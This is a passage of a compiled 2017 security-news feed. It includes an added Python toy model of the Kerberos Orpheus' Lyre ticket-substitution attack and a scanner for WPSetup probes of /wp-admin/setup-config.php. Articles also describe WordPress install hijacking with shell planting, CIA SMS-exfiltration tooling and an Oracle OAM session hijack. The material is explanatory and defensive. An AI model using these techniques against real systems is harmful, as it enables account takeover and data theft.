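To make that extraction bug concrete, the following Python model (added here; it is not code from Heimdal, Microsoft or the researchers) builds a KDC-REP in which the service name appears twice: once in the Ticket, which is sealed for the service and therefore unauthenticated from the client’s point of view, and once in enc-part, which is sealed under the client’s own key. The sealing primitive is an illustrative HMAC-SHA256 keystream-plus-tag construction rather than Kerberos encryption, and every principal name and key is made up. extract_ticket_vulnerable mirrors the pre-fix logic of filing the credential under the name found in the Ticket; extract_ticket_fixed takes the name from enc-part, which an on-path attacker cannot forge. The attacker in the model owns a service principal, swaps in a Ticket it can decrypt and labels it krbtgt/EXAMPLE.COM, which is how the Ticket substitution becomes server impersonation.

```python
"""Toy model of Orpheus' Lyre (CVE-2017-11103): the client must read the service name
from the authenticated enc-part of a KDC-REP, never from the unauthenticated Ticket.
Added example; names, keys and the sealing primitive are illustrative, not Kerberos."""
import hashlib
import hmac
import json
import os
from typing import Any, Dict

# Stand-in for Kerberos' integrity-protected encryption: HMAC-SHA256 keystream plus a tag.
def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    out, block = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + block.to_bytes(4, "big"), hashlib.sha256).digest()
        block += 1
    return out[:length]

def seal(key: bytes, fields: Dict[str, Any]) -> Dict[str, bytes]:
    nonce = os.urandom(16)
    pt = json.dumps(fields, sort_keys=True).encode()
    ct = bytes(p ^ k for p, k in zip(pt, _keystream(key, nonce, len(pt))))
    return {"nonce": nonce, "ct": ct, "tag": hmac.new(key, nonce + ct, hashlib.sha256).digest()}

def unseal(key: bytes, blob: Dict[str, bytes]) -> Dict[str, Any]:
    tag = hmac.new(key, blob["nonce"] + blob["ct"], hashlib.sha256).digest()
    if not hmac.compare_digest(tag, blob["tag"]):
        raise ValueError("enc-part failed integrity check")
    pt = bytes(c ^ k for c, k in zip(blob["ct"], _keystream(key, blob["nonce"], len(blob["ct"]))))
    return json.loads(pt)

# KDC side: the service name appears twice in the reply. The Ticket is sealed for the
# *service*, so the client cannot check it; only enc-part is sealed for the client.
def kdc_rep(client_key, service_key, cname, sname, session_key):
    ticket = {"sname": sname,  # plaintext, unauthenticated from the client's point of view
              "enc_part": seal(service_key, {"cname": cname, "key": session_key.hex()})}
    return {"cname": cname, "ticket": ticket,
            "enc_part": seal(client_key, {"sname": sname, "key": session_key.hex()})}

# Client side: the bug and the fix.
def extract_ticket_vulnerable(client_key, rep):
    """Pre-fix behaviour: the name the credential is filed under comes from the Ticket."""
    creds = unseal(client_key, rep["enc_part"])
    return {"sname": rep["ticket"]["sname"], "key": creds["key"], "ticket": rep["ticket"]}

def extract_ticket_fixed(client_key, rep):
    """Post-fix behaviour: every field the client acts on comes from enc-part."""
    creds = unseal(client_key, rep["enc_part"])
    return {"sname": creds["sname"], "key": creds["key"], "ticket": rep["ticket"]}

def ticket_name_mismatch(client_key, rep) -> bool:
    """Extra check a hardened client can make: the two copies of the name must agree."""
    return unseal(client_key, rep["enc_part"])["sname"] != rep["ticket"]["sname"]

# On-path attacker who owns a service principal (attacker_key) swaps in a Ticket it can
# decrypt and labels it with a name of its choosing; enc-part is left alone (unforgeable).
def substitute_ticket(rep, attacker_key, chosen_sname):
    forged = {"sname": chosen_sname,
              "enc_part": seal(attacker_key, {"cname": rep["cname"], "key": "known-to-attacker"})}
    return {**rep, "ticket": forged}

def demo():
    client_key, service_key, attacker_key = (os.urandom(32) for _ in range(3))
    rep = kdc_rep(client_key, service_key, "alice@EXAMPLE.COM",
                  "host/fileserver.example.com", os.urandom(16))
    evil = substitute_ticket(rep, attacker_key, "krbtgt/EXAMPLE.COM")
    return {"vulnerable": extract_ticket_vulnerable(client_key, evil)["sname"],
            "fixed": extract_ticket_fixed(client_key, evil)["sname"],
            "mismatch": ticket_name_mismatch(client_key, evil)}

if __name__ == "__main__":
    print(demo())
```

Running demo() shows the vulnerable client filing the attacker’s ticket under krbtgt/EXAMPLE.COM while the fixed client keeps the authentic host/fileserver.example.com, and ticket_name_mismatch flags the substitution. Any attempt to alter enc-part instead makes unseal raise, which is why the fix is to use that copy.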

“The fact that this has been around for as long as it has been in open source, I think, is just one more case that should debunk the theory that open source programming is in some way more secure than closed source programming,” Altman said.

The expert pointed out that if an IT giant like Microsoft failed to spot the problem, it is no surprise that other companies, and the open source community as a whole, missed it too.

Altman has no doubt that issues of this kind will continue to plague the open-source community, because developers are often not compensated for their contributions.

“We will never be reimbursed for the cost to our lives and the lost time to our companies for having done this favor to the world,” Altman concluded. “As a society, we need to understand what the costs of this work are.”


Ubuntu Linux for Windows 10 Released — Yes, You Read it Right

14.7.2017 thehackernews  IT

Windows and Linux in the same line? Yes, you heard that right... and that too, on the same computer and within the same operating system.
Two months ago, Microsoft announced its plans to let its users install three different flavours of the Linux operating system – Ubuntu, Fedora, and SUSE – directly through their Windows Store, allowing them to run Windows and Linux apps side-by-side.
Now, downloading an entire operating system has just become as easy as downloading an application with the availability of popular Linux distro 'Ubuntu' in the Windows App Store.
However, unlike a conventional Ubuntu installation, this version runs in a sandboxed environment alongside Windows 10 with limited interaction with the rest of the operating system, and is focused on running regular command-line utilities such as bash or SSH as a standalone installation through an Ubuntu Terminal.
Ubuntu is currently only available to Windows 10 Insiders and will be made available to the public with the upcoming Windows 10 Fall Creators Update, which is expected in September/October 2017.
Here's How to Install and Run Ubuntu on Windows 10
Users registered in the Windows 10 Insider Program with at least Build 16215 installed can directly install Ubuntu from the Windows Store, which will allow them to "use Ubuntu Terminal and run Ubuntu command line utilities including bash, ssh, git, apt and many more."
After installing Ubuntu, Windows 10 users will need to enable the "Windows Subsystem for Linux" feature that was previously added to Windows 10.
To enable it, follow these simple steps:
Navigate to Control Panel and go to "Apps and features" settings.
Select "Programs and Features" from the right panel.
Open the "Turn Windows features on or off" from the left menu.
Select the "Windows Subsystem for Linux" and save it.
Reboot Your system.
While the company has not revealed exactly when users can expect to see the other two Linux distros, Fedora and SUSE Linux, in the Windows Store, this step by Microsoft follows its commitment to the open source community.

In 2013, Microsoft launched Visual Studio 2013, and a year later the company open-sourced .NET. In 2015, the tech giant open sourced the Visual Studio Code editor as well.
Last year, Microsoft took many steps to show its love for Linux, including bringing Ubuntu's Bash shell to Windows 10, working with FreeBSD to develop a virtual machine image for its Azure cloud, choosing Ubuntu as the OS for its cloud-based big data services, and even joining the Linux Foundation as a Platinum member, the highest level of membership.
Have you tried out Ubuntu on Windows 10? If yes, let us know your experience in the comments below.


AlphaBay Shut Down After Police Raid; Alleged Founder Commits Suicide in Jail
14.7.2017 thehackernews  BigBrothers

AlphaBay Market — one of the largest Dark Web marketplaces for drugs, guns, and other illegal goods — that mysteriously went dark earlier this month without any explanation from its admins has reportedly been shut down by the international authorities.
On July 4th, the dark web marketplace suddenly went down without any explanation from its admins, leaving customers who had paid in large sums in a panic.
Some customers even suspected that the site's admins had pulled an exit scam to steal user funds.
However, according to the Wall Street Journal, the disappearance of AlphaBay came after authorities in the United States, Canada, and Thailand collaborated to conduct a series of raids and arrest Alexandre Cazes, who allegedly was one of AlphaBay's operators.
Citing "people familiar with the matter," the publication claims that Cazes, a resident of Canada, was arrested in Thailand and taken into custody in Bangkok on July 5th, the same day the police executed two raids on residences in Quebec, Canada.
The 26-year-old Canadian citizen was awaiting extradition to the United States when a guard found him hanged in his jail cell on Wednesday, the Chiang Rai Times confirms. Cazes is believed to have hanged himself using a towel.

Cazes had been living in Thailand for nearly 8 years. During his arrest, authorities also seized "four Lamborghini cars and three houses worth about 400 million baht ($11.7 million) in total."
AlphaBay, also known as "the new Silk Road," also made the news at the beginning of this year when a hacker successfully breached the AlphaBay site and stole over 200,000 private unencrypted messages from several users.
After the disappearance of Silk Road, AlphaBay emerged in 2014 and became a leader among dark web marketplaces for selling illicit goods from drugs to stolen credit card numbers, exploits, and malware.
Unlike dark web market 'Evolution' that suddenly disappeared overnight from the Internet, stealing millions of dollars worth of Bitcoins from its customers, AlphaBay Market was shut down by the law enforcement, suffering the same fate as Silk Road.
Silk Road was shut down after the law enforcement raided its servers in 2013 and arrested its founder Ross William Ulbricht, who has been sentenced to life in prison.
The FBI also seized Bitcoins (worth about $33.6 million, at the time) from the site. Those Bitcoins were later sold in a series of auctions by the United States Marshals Service (USMS).


WPSetup attack: hackers target incomplete WordPress installs
1.7.2017 securityaffairs
Attack

Attackers are using automated scans to target freshly installed WordPress websites; WordFence researchers have dubbed the technique the WPSetup attack.
According to the team behind the WordFence security plugin for WordPress, attackers are using automated scans to find freshly installed WordPress websites whose administrators have not yet finished configuring them, and to take over those sites before the owner does. The experts dubbed this the WPSetup attack.

Hackers launch thousands of scans each day, searching for the URL /wp-admin/setup-config.php, which new WordPress installs use to set up a site.

The attackers aim to find new WordPress installs that are not yet configured by the administrators.

Between the end of May and mid-June, WordFence researchers observed a spike in the number of scans targeting fresh WordPress installations.

“In May and June, we saw our worst-of-the-worst IPs start using a new kind of attack targeting fresh WordPress installations.” states WordFence.

“We also had our first site cleaning customer that was hit by this attack.

Attackers scan for the following URL:

/wp-admin/setup-config.php

This is the setup URL that new installations of WordPress use. If the attacker finds that URL and it contains a setup page, it indicates that someone has recently installed WordPress on their server but has not yet configured it. At this point, it is very easy for an attacker to take over not just the new WordPress website, but the entire hosting account and all other websites on that hosting account.”

Activity peaked on May 30, when the experts observed roughly 7,500 scans in a single day.


The WPSetup attack relies on the fact that the user has not yet finished setting up the WordPress installation: the attacker simply completes the installation in the user’s place.

Because the setup wizard is reachable without any authentication, the attackers can enter a database name, username, password and database server of their own choosing and finish the install with an administrator account they control. They can then take over the website with their own installation or create a supplementary account.

How the WPSetup Attack Gets Full Control of Your Hosting Account?

Once the attacker gains admin access to a WordPress website running on your hosting account, they can execute PHP code via a theme or plugin editor.

The attackers can install a shell in a victim’s directory to access any files or websites on the account or access any databases or application data.

“Once an attacker can execute code on your site, they can perform a variety of malicious actions. One of the most common actions they will take is to install a malicious shell in a directory in your hosting account. At that point they can access all files and websites on that account. They can also access any databases that any WordPress installation has access to, and may be able to access other application data.” continues the analysis.

WordFence explained that the WPSetup attack is not new, but this is the first time it has been seen at this scale.

WordFence recommends that users create an .htaccess file in the base of their web directory so that nobody but them can reach the setup page before the installation is complete.

“Before you install a fresh WordPress installation, create a .htaccess file in the base of your web directory containing the following:

order deny,allow
deny from all
allow from <your ip>

Replace the ‘<your ip>’ with your own IP address. You can find this out by visiting a site like whatsmyip.org.

This rule ensures that only you can access your website while you are installing WordPress. This will prevent anyone else from racing in, completing your installation and taking control of your hosting account by uploading malicious code.

Once complete, you can remove the .htaccess rule and allow the rest of the world to access your website.”
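
As an added example (not WordFence’s code), the Python below covers both halves of the article: detecting the scans described earlier and generating the lockdown rule quoted above. It runs over Apache/nginx combined-format access log lines (a few constructed ones, using documentation IP ranges, are embedded) to report who has been probing /wp-admin/setup-config.php and whether anyone POSTed database settings to it, and it emits the .htaccess rule. One caveat for practitioners: the Order/Deny/Allow directives in the quote are Apache 2.2 syntax; on Apache 2.4 they only work when mod_access_compat is loaded, and the native form is Require ip, so the generator can produce either. nginx does not read .htaccess at all, so there the equivalent allow/deny block has to go in the server configuration.

```python
"""Added example: spot WPSetup probing in web-server access logs and emit the lockdown
.htaccess rule in Apache 2.2 and 2.4 syntax. Not WordFence code; log lines are constructed."""
import ipaddress
import re
from collections import defaultdict
from typing import Dict, List, Tuple

SETUP_PATH = "/wp-admin/setup-config.php"

# Apache/nginx "combined" format: ip ident user [time] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

SAMPLE_LOG = [  # constructed for this example; 203.0.113.0/24 etc. are documentation ranges
    '203.0.113.5 - - [30/May/2017:10:15:01 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 200 3812 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [30/May/2017:10:15:02 +0000] "POST /wp-admin/setup-config.php?step=2 HTTP/1.1" 200 1208 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [30/May/2017:10:16:40 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 209 "-" "python-requests/2.18"',
    '192.0.2.44 - - [30/May/2017:10:17:03 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def parse_line(line: str):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_setup_probes(lines) -> Dict[str, List[Tuple[str, str, int]]]:
    """Every request for the setup page, grouped by source IP as (timestamp, method, status)."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["path"].split("?", 1)[0] == SETUP_PATH:
            hits[rec["ip"]].append((rec["ts"], rec["method"], int(rec["status"])))
    return dict(hits)

def takeover_attempts(lines) -> List[Tuple[str, str]]:
    """A POST to the setup page is someone submitting database settings. If it was not you,
    treat the site and the hosting account as compromised and look for a dropped shell."""
    return [(ip, ts) for ip, events in find_setup_probes(lines).items()
            for ts, method, _status in events if method == "POST"]

def htaccess_lockdown(allowed, apache24: bool = True) -> str:
    """Restrict the whole docroot to the installer's address(es) until setup is finished.
    Apache 2.4 uses Require; Order/Deny/Allow is 2.2 syntax (needs mod_access_compat on 2.4)."""
    nets = []
    for entry in allowed:
        net = ipaddress.ip_network(entry, strict=False)   # raises ValueError on garbage input
        nets.append(str(net.network_address) if net.num_addresses == 1 else net.with_prefixlen)
    if apache24:
        return "Require ip " + " ".join(nets) + "\n"
    return "Order deny,allow\nDeny from all\n" + "".join(f"Allow from {n}\n" for n in nets)

if __name__ == "__main__":
    for ip, events in find_setup_probes(SAMPLE_LOG).items():
        posted = any(method == "POST" for _ts, method, _st in events)
        print(ip, len(events), "probe(s)", "POST seen" if posted else "")
    print(htaccess_lockdown(["203.0.113.5"]))
```

Feed it the real access log (one line per element) instead of SAMPLE_LOG; the 404 from 198.51.100.7 in the sample shows a scanner hitting a host where the setup page is already gone, which is the benign outcome, while the POST from 203.0.113.5 is the one to investigate.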


Eternal Blues scanner finds 50,000 EternalBlue-vulnerable hosts
1.7.2017 securityaffairs Safety

The Eternal Blues scanner allowed administrators worldwide to discover more than 50,000 computers vulnerable to the NSA-linked EternalBlue exploit.
Recently the security researcher Elad Erez developed Eternal Blues, a free EternalBlue vulnerability scanner that could be used by administrators to assess networks.


Erez has now published the data collected by Eternal Blues over its first two weeks, and the results are disconcerting: more than 50,000 scanned hosts are still vulnerable to the exploit. The figure is even more worrying when you consider that a single vulnerable machine can expose an entire network to attackers.

In one case, the administrator of a network of almost 10,000 hosts discovered that just two machines were still vulnerable, information that was crucial for protecting the entire network.

As of July 12, the Eternal Blues tool was used to scan more than 8 million IPs, 1.5 million are located in France.


Erez revealed that vulnerable machines were found in around 130 countries, and that the top three countries accounted for more than 30,000 vulnerable machines between them.

The majority (53.82%) of scanned hosts still have SMBv1 enabled, and on average 1 out of 9 hosts in a network is vulnerable to EternalBlue.

Although Eternal Blues found only around 50,000 vulnerable systems, Erez explained that the real number is much higher: a bug in the early releases of the tool prevented it from counting vulnerable hosts correctly.

Erez issued a new release of the tool on July 2 that fixes the above problems.

Below the results of the scan:

More than 8 million IPs were scanned. France taking the lead with 1.5 million
The top 3 vulnerable countries (out of ~130), had more than 30,000 vulnerable hosts altogether
The majority (53.82%) of hosts nowadays still have SMBv1 enabled
1 out of 9 hosts in a network is vulnerable to EternalBlue
One network, with almost 10,000 hosts (not IPs), had 2 vulnerable hosts. How could anyone find that without Eternal Blues?

Erez is satisfied that the scanner has significantly raised awareness of the EternalBlue exploit and has allowed administrators to secure their networks.

“Unfortunately, exploitation of EternalBlue is still a very good method of invoking remote code execution. It is available in more than 50,000 hosts scanned by Eternal Blues (as for July 12, 2017). Yes, even after all the latest attacks by WannaCry and NotPetya. I’m here to remind you, sometimes it takes just 1 vulnerable machine to take you down.” concluded the expert.

“Although numbers are quite high (remember, these are IPs scanned with my tool only), I feel like awareness did increase somewhat. Running Eternal Blues is, by definition, being aware of the problem. So good for you for taking responsibility and checking your network status. Now it’s patching time!”

Administrators are advised to scan their networks periodically for the EternalBlue (MS17-010) flaw, to apply the latest patches and to disable the SMBv1 protocol.


How CIA Agents Covertly Steal Data From Hacked Smartphones (Without Internet)
14.7.2017 thehackernews BigBrothers

WikiLeaks has today published the 16th batch of its ongoing Vault 7 leak. This time, instead of revealing new malware or a hacking tool, the whistleblower organisation has unveiled how CIA operatives stealthily collect and forward stolen data from compromised smartphones.
Previously we have reported about several CIA hacking tools, malware and implants used by the agency to remotely infiltrate and steal data from the targeted systems or smartphones.
However, this time neither Wikileaks nor the leaked CIA manual clearly explains how the agency operatives were using this tool.
But, since we have been covering every CIA leak from the very first day, we have understood a possible scenario and have illustrated how this newly revealed tool was being used.
Explained: How CIA Highrise Project Works
In general, malware that has compromised a machine uses its internet connection to send stolen data to an attacker-controlled server (a listening post), but on smartphones malware has an alternative channel for sending stolen data to the attackers: SMS.
But for collecting stolen data via SMS, one has to deal with a major issue – to sort and analyse bulk messages received from multiple targeted devices.
To solve this issue, the CIA created a simple Android application, dubbed Highrise, which works as an SMS proxy between the compromised devices and the listening post server.
"There are a number of IOC tools that use SMS messages for communication and HighRise is a SMS proxy that provides greater separation between devices in the field ('targets') and the listening post by proxying 'incoming' and 'outgoing' SMS messages to an internet LP," the leaked CIA manual reads.
What I understood after reading the manual is that CIA operatives need to install an application called "TideCheck" on their Android devices, which are set to receive all the stolen data via SMS from the compromised devices.
The last known version of the TideCheck app, HighRise v2.0, was developed in 2013 and works on mobile devices running Android 4.0 to 4.3, though I believe that by now they have developed updated versions that work on the latest Android releases.

Once installed, the app prompts for a password, which is "inshallah," and after login, it displays three options:
Initialize — to run the service.
Show/Edit configuration — to configure basic settings, including the listening post server URL, which must be using HTTPS.
Send Message — allows CIA operative to manually (optional) submit short messages (remarks) to the listening post server.
Once initialized and configured properly, the app continuously runs in the background to monitor incoming messages from compromised devices; and when received, forwards every single message to the CIA's listening post server over a TLS/SSL secured Internet communication channel.
Previous Vault 7 CIA Leaks
Last week, WikiLeaks dumped two alleged CIA implants that allowed the agency to intercept and exfiltrate SSH credentials from targeted Windows and Linux operating systems using different attack vectors.
Dubbed BothanSpy and Gyrfalcon, the first is an implant for the Xshell client on Microsoft Windows, while the second targets the OpenSSH client on various Linux distributions, including CentOS, Debian, RHEL (Red Hat), openSUSE and Ubuntu.
Since March, the whistleblowing group has published 16 batches of "Vault 7" series, which includes the latest and last week leaks, along with the following batches:
OutlawCountry – An alleged CIA project that allowed it to hack and remotely spy on computers running the Linux operating systems.
ELSA – Alleged CIA malware that tracks geo-location of targeted computers and laptops running the Microsoft Windows operating system.
Brutal Kangaroo – A tool suite for Microsoft's Windows used by the spying agency to target closed networks or air-gapped computers within an organisation or enterprise without requiring any direct access.
Cherry Blossom – An agency's framework used for monitoring the Internet activity of the targeted systems by exploiting vulnerabilities in Wi-Fi devices.
Pandemic – A CIA's project that allowed the agency to turn Windows file servers into covert attack machines that can silently infect other computers of interest inside a targeted network.
Athena – An agency's spyware framework that has been developed to take full control of the infected Windows machines remotely, and works for every version of Microsoft's Windows operating systems, from XP to Windows 10.
AfterMidnight and Assassin – Two CIA malware frameworks for the Windows platform that have been designed to monitor activities on the infected remote host computer and execute malicious actions.
Archimedes – Man-in-the-middle attack tool allegedly developed by the CIA to target computers inside a Local Area Network (LAN).
Scribbles – Software reportedly designed to embed 'web beacons' into confidential documents, allowing the agency to track insiders and whistleblowers.
Grasshopper – Framework that allowed the CIA hackers to easily create their custom malware for breaking into Microsoft's Windows OS and bypassing antivirus protection.
Marble – Source code of a secret anti-forensic framework used by the agency to hide the actual source of its malware.
Dark Matter – Hacking exploits the spying agency designed to target iOS and Mac systems.
Weeping Angel – Spying tool used by the CIA hackers to infiltrate smart TVs, transforming them into covert microphones.
Year Zero – Alleged CIA hacking exploits for popular software and hardware.


EFF Reviews Privacy Practices of Online Service Providers

14.7.2017 securityweek BigBrothers

During 2016, the US government made 49,868 requests to Facebook for user data; 27,850 requests to Google; and 9,076 requests to Apple. Governments will not stop making these requests, since the internet has become a major avenue for mass surveillance. The real issue is to what extent internet companies will seek to protect their users' data from unwarranted government intrusions.

Each year, the Electronic Frontier Foundation (EFF) publishes an annual 'Who Has Your Back' analysis of the basic privacy policy of major online service providers. It looks at five primary characteristics:

• Best privacy practices (including a satisfactory public, published policy and a published transparency report)

• Informs users about government data requests (in advance of actually handing over any data)

• Refusal to hand over data without legal requirement (including by leakage or sale to third parties)

• Stands up to National Security Letter (NSL) gag orders (with a public pledge to invoke the right to seek judicial review of all indefinite gag orders)

• Has a pro-user public policy (including support for reform of Section 702 of the FISA Amendments Act that will reduce the collection of information on innocent people).

A star is awarded for each category satisfied by the provider. This year (PDF), nine out of 26 evaluated companies have been awarded five stars: Adobe, Credo, Dropbox, Lyft, Pinterest, Sonic, Uber, Wickr, and WordPress.

Telecoms companies generally perform poorly. "When it comes to adopting policies that prioritize user privacy over facilitating government data demands," notes the report, "the telecom industry for the most part has erred on the side of prioritizing government requests." Particularly at fault here are AT&T, Comcast, T-Mobile, and Verizon -- all with a single star in the 'best practices' category.

This is not, however, universal in telecoms. "Credo Mobile [5 stars] has repeatedly proven that telecom companies can adopt policies that earn credit in every category year after year. Similarly, Sonic [5 stars], an ISP competitor to AT&T, Comcast, T-Mobile, and Verizon, has now earned credit in every category of EFF's annual report for five years."

Some technology companies that have been high performers in previous years have dropped from that position this year -- for example, Facebook, Google and Twitter. All three have so far failed to publicly commit to requesting judicial review of all NSLs. Fewer than half of the reviewed companies have actually made that commitment: Adobe, Airbnb, Apple, Credo, Dropbox, Lyft, Pinterest, Slack, Sonic, Uber, Wickr, and WordPress.

"We applaud these companies that have taken a public stand to ensure judicial oversight of gag orders and urge others within the technology space to do the same," says EFF.

Failure to be awarded all five stars should not in itself suggest a complete failure in user privacy concern -- only that the company could do even better. For example, of Google, EFF says, "This is Google's sixth year in Who Has Your Back, and it has adopted a number of industry best practices, including publishing a transparency report, requiring a warrant for content, and publishing its guidelines for law enforcement requests. Google promises to inform users before disclosing their data to the government and supports substantive reforms to rein in NSA surveillance. Google prohibits third parties from allowing Google user data to be used for surveillance purposes."

Its failure to win five stars this year is down solely to the lack of a public policy of demanding judicial review of NSLs. "We urge Google to create a public policy of requesting judicial review of all National Security Letters," says EFF. On its own, this does not mean that Google has no such policy (it may or may not); it simply has not publicly avowed one.

Apple is another tech giant that just falls short of five stars. Unlike Google, it does have a publicly stated policy of demanding a judicial review on all NSLs. Apple's published policy states, "If Apple receives a National Security Letter (NSL) from the U.S. government that contains an indefinite gag order, Apple will notify the government that it would like the court to review the nondisclosure provision of the NSL pursuant to USA FREEDOM."

Apple is not, however, specifically campaigning for the reform of Section 702.

Two companies criticized by EFF are Amazon and WhatsApp, both receiving just 2 stars. While EFF praises WhatsApp's move to adopt end-to-end encryption by default for its billion users, its policies still lag behind. Amazon has been rated number one in customer service, yet it hasn't made the public commitments to stand behind its users' digital privacy that the rest of the industry has.

"The tech industry as a whole has moved toward providing its users with more transparency," comments EFF senior staff attorney Nate Cardozo, "but telecommunications companies -- which serve as the pipeline for communications and Internet service for millions of Americans -- are failing to publicly push back against government overreach. Both legacy telcos and the giants of Silicon Valley can and must do better. We expect companies to protect, not exploit, the data we have entrusted them with."


Samsung Tizen Accused of Being Home to at Least 27,000 Findable Bugs

14.7.2017 securityweek Vulnerebility

A purveyor of static code analysis wished to pitch his product to Samsung. What better way, he thought, than to run his product against the Samsung Tizen operating system, and demonstrate the results. The demonstration fell through, and the purveyor decided instead to publish his findings.

The purveyor is Andrey Karpov, CTO at "Program Verification Systems" Co Ltd and one of the developers of PVS-Studio. In a report published Wednesday, he claims that PVS-Studio would find 27,000 coding errors in Tizen. He actually checked only 3.3% of the code; but finding about 900 errors, he believes that would extrapolate to 27,000.

If his figures are correct, it could be a lot worse. He suggests that a single run of PVS-Studio will detect "more than 10% of errors that are present in the code," and that regular use would push that up to about 20% of the errors; either way, the implication is that Tizen potentially houses more than 250,000 bugs.

Tizen is a Linux-based open-source operating system designed for wide use in Samsung products: smartphones, tablets, smart TVs, smart watches, cameras and PCs. The project started in 2013, and by 2015 it had reached smartphones. Today it can be found on millions of devices and especially smart TVs.

Tizen is not new to controversy. Earlier this year security researcher Amihai Neiderman, then at Israeli firm Equus Technologies, reported the presence of 40 zero-day vulnerabilities in Tizen. "Right now, Tizen isn't mature enough, isn't ready enough to be sent to the public like this," he commented. "If those vulnerabilities I found in a few hours of research, then somebody who's really going to dedicate himself to be a Tizen researcher will find way more vulnerabilities."

27,000 bugs do not translate to 27,000 vulnerabilities -- but some of them could. For example, Karpov claims to have found 52 errors in which private data is not cleared. Only one is in the direct Samsung code -- the rest are in third-party libraries used in Tizen. "I think this is a serious omission," he writes, "since it does not matter which part of the program will be erroneous, when private data will remain somewhere in memory and then someone will use it."

Karpov wrote an open letter to Samsung in May 2017. He described a number of the errors he had found, and said "Our team is willing to work on improving the quality of Tizen project. The text contains remarks to the code fragments, but this is not criticism. All projects have bugs. The aim was to show by real examples that we aren't talking about abstract recommendations concerning the code improvement, but about real defects that we can find and fix."

Samsung's Youil Kim rejected the approach. Stating that "We currently have our own static analysis tool and run it regularly for Tizen," Kim added, "However, we don't agree that Tizen has 27,000 defects that should be fixed."

Karpov begs to differ.

SecurityWeek has reached out to Samsung for a statement on this issue, but has had no response at the time of writing. If one is received, it will be appended to the post.


Dell Launches Endpoint Security Product for Air-Gapped Systems

13.7.2017 securityweek Safety

Dell announced on Thursday the availability of a new version of its Endpoint Security Suite Enterprise product designed specifically for air-gapped systems.

The solution is designed to protect isolated computers from malware, insiders and other threats using artificial intelligence and predictive mathematical models provided by endpoint security firm Cylance.

Researchers have demonstrated in recent years that malware can leverage several methods to exfiltrate sensitive data from air-gapped systems, including through noise, LEDs, heat and radio frequencies.

Since isolated systems are not connected to the Internet, the security products installed on them cannot automatically receive regular malware definitions and other updates. By teaming up with Cylance, whose mathematical models only require a few updates per year, Dell has developed a solution that can protect a device without requiring an Internet connection.

In addition to threat protection features, Endpoint Security Suite Enterprise provides data encryption capabilities designed for securing files on any device against both external attacks and insiders (e.g. malicious USB drives). IT teams can enforce encryption policies on multiple endpoints and operating systems without disrupting productivity, Dell said. The product also includes web protection filtering capabilities.

Three versions of Dell Endpoint Security Suite Enterprise are currently available: one for systems with an Internet connection, one for devices that connect to an on-premises server for updates, and one for systems that are completely isolated.

"Highly-regulated organizations and government agencies need to deploy air gap solutions to protect their highly sensitive data, but have been unable to take advantage of the latest security technology that requires cloud connections," said Brett Hansen, vice president of Endpoint Data Security and Management at Dell.

"Dell is responding to their heightened needs by adapting our flagship Endpoint Security Suite Enterprise solution for on-premises, air gap environments – giving these organizations an advanced threat protection solution that has been inaccessible to them before now," Hansen added.

The air gap version of Dell Endpoint Security Suite Enterprise is available now in the United States and other select countries around the world.


'HighRise' Android Malware Used by CIA to Intercept SMS Messages

13.7.2017 securityweek BigBrothers

WikiLeaks on Thursday published a user guide describing what appears to be a tool used by the U.S. Central Intelligence Agency (CIA) to intercept SMS messages on Android mobile devices.

Named HighRise, the version of the malware described in the WikiLeaks document is disguised as an app called TideCheck, and it only works on Android versions between 4.0 and 4.3.

According to its developers, the tool must be manually downloaded, installed and activated on the targeted device – this means that the attacker needs to have physical access to the smartphone or trick victims into installing it themselves.

The second scenario is less likely as activating the app requires the user to open the TideCheck app, enter the “inshallah” password (the Arabic expression for “God willing”), and select the “Initialize” option from the menu. The document shows that the app will automatically run in the background after a reboot once it has been manually activated.

HighRise can be used to proxy incoming SMS messages received by the compromised device to a remote server. The tool also includes functionality for sending messages to the server via a secure communications channel.

The user guide leaked by WikiLeaks is for version 2.0 of HighRise and it’s dated December 2013. Google has made numerous security improvements to the Android operating system since version 4 – the latest version is Android 7 Nougat – and malware such as HighRise may no longer work without significant updates.

On the other hand, cybercriminals have been keeping up with the improvements and they still manage to create profitable Android malware. Furthermore, given that HighRise requires a significant amount of user interaction, it’s possible that this or other similar projects are still successfully utilized by the CIA.

Over the past months, WikiLeaks has described several “Vault 7” tools allegedly used by the agency. The most recent leaks detail malware designed for redirecting traffic on Linux systems (OutlawCountry), stealing SSH credentials (BothanSpy), spreading malware on an organization’s network (Pandemic), locating people via their device’s Wi-Fi (Elsa), hacking routers and access points (Cherry Blossom), and accessing air-gapped networks (Brutal Kangaroo).


Researchers Remotely Hijack Oracle OAM 10g Sessions

13.7.2017 securityweek Hacking

Two security researchers recently discovered an issue with improperly configured Oracle Access Manager (OAM) 10g that can be exploited by remote attackers to hijack sessions from unsuspecting users.

The issue, security researchers Nabeel Ahmed and Tom Gilis discovered, is related to the OAM authentication flow. In this Oracle Single Sign-On (SSO) implementation, the OAM server only validates whether the requested resource is indeed protected or not, and then redirects the user to a login page.

The OAM Server, the researchers note, sets the OAMREQ cookie (which contains information regarding the location of the requested resource) in the user's browser, so it would know on the next request for which resource the user is authenticating.

Next, the user submits credentials on the provided login screen, and the OAM server verifies them and, if the logon is successful, serves a cookie and a valid session, while also redirecting the user to the protected resource.

While analyzing the cookies the server delivers to the user, the security researchers noticed that the request/response flow contains some red flags. One of them is a parameter called rh=, which is the domain of the protected resource, while the other is the fact that the cookie is sent via a GET request.

The security researchers also noticed that, while the OAM server validates whether the resource is protected or not, it doesn’t serve an error if the resource doesn’t exist. Even in such cases, the OAM server redirects the user to the login page and serves an OAMREQ cookie.

After receiving a cookie for a non-existing resource, the researchers tested their findings against real resources and discovered two issues: the user is redirected after submitting credentials (Open Redirect), and the cookie value is transmitted in the GET request.

“Since we can control where the user has to go and since we also can read the cookie value that is coming from the user we can hijack his session,” Ahmed notes.

